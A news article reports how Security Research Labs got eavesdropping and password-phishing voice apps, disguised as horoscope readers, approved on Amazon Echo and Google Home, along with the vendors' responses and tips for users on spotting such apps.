Experts at Security Research Lab were able to easily bypass the defenses of two major smart speaker companies during a test of these companies' security practices.
Security Research Lab's engineers were able to do the security bypass by disguising eight applications designed to target personal data like voice-recordings and passwords of both Google Home and Amazon Echo users, as software that reads horoscopes through voice-commands.
Among the first layers of defense that they were able to breach, the researchers said, were Google and Amazon’s moderation teams, who they mentioned in a report as having readily approved their bogus apps. That incident, the researchers said, was a lapse that merits greater scrutiny.
One app, the Berlin-based researchers said, was designed to trick users into thinking that their devices are inactive by issuing fake error messages after being activated by a programmed wake-word. In reality, the app remained open and with the microphone engaged.
According to the research team, this could provide hackers the opportunity to eavesdrop on any conversations that happen within earshot.
Another app, on the other hand, was designed to harvest passwords by tricking users into spelling them out in order to supposedly facilitate a program update. Once the user spells out his password, the app, according to its creators, then transcribes it before sending the information to a remote server. (Related: SCARY: Computer experts show how easy it is to hack off-the-shelf smart devices like baby monitors and home security cameras.)
The apps were only removed once researchers made the company aware of their test.
In their report, the Security Research Lab team said their findings should act as a wake-up call for users of microphone-enabled smart home devices who may not be aware the technology can be easily exploited by hackers and other cybercriminals.
"The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood," the researchers said in their report, noting that voice-activated apps must be approached with caution.
The research group's findings came in the wake of the revelation that tech giants Google, Amazon, Apple, Microsoft and Facebook used contractors to comb through audio recordings of their products' users -- including recordings not intended for their devices’ operation, such as business calls and private conversations.
The tech giants have defended this, noting in separate statements that they keep and monitor the recordings in order to purportedly improve the accuracy of their Smart Assistants.
Amazon, by default, records every user interaction with Alexa, the same as with Google. Both their smart devices hold onto their users' recordings unless manually changed in the device's Settings.
As detailed in several reports, both Amazon and Google have updated their processes for publishing new Alexa skills and Google actions to prevent this from happening.
"We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified," Amazon said in a statement.
Google, meanwhile, noted that they are putting additional mechanisms in place to prevent similar issues from occurring again in the future.
"Smart spies undermine the assumption that voice apps are only active as long as they are in dialogue with the user," Karsten Nohl, SRL's chief scientist, said in an interview with the BBC, adding that there are ways to check if your device is "spying" on its users.
One of these, Nohl said, is to check if the device is asking for the user's password.
"Users should be very suspicious when any smart speaker asks for a password, which no regular app is supposed to do," Nohl said.
Another indicator, according to Nohl, is more visible: the smart-speaker light remains on.
This, Nohl, said, is an indicator that the device is still listening.
"Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers," the think tank said in a statement.
For more stories and articles about the dangers of unmonitored technology, visit Glitch.news.
Sources include: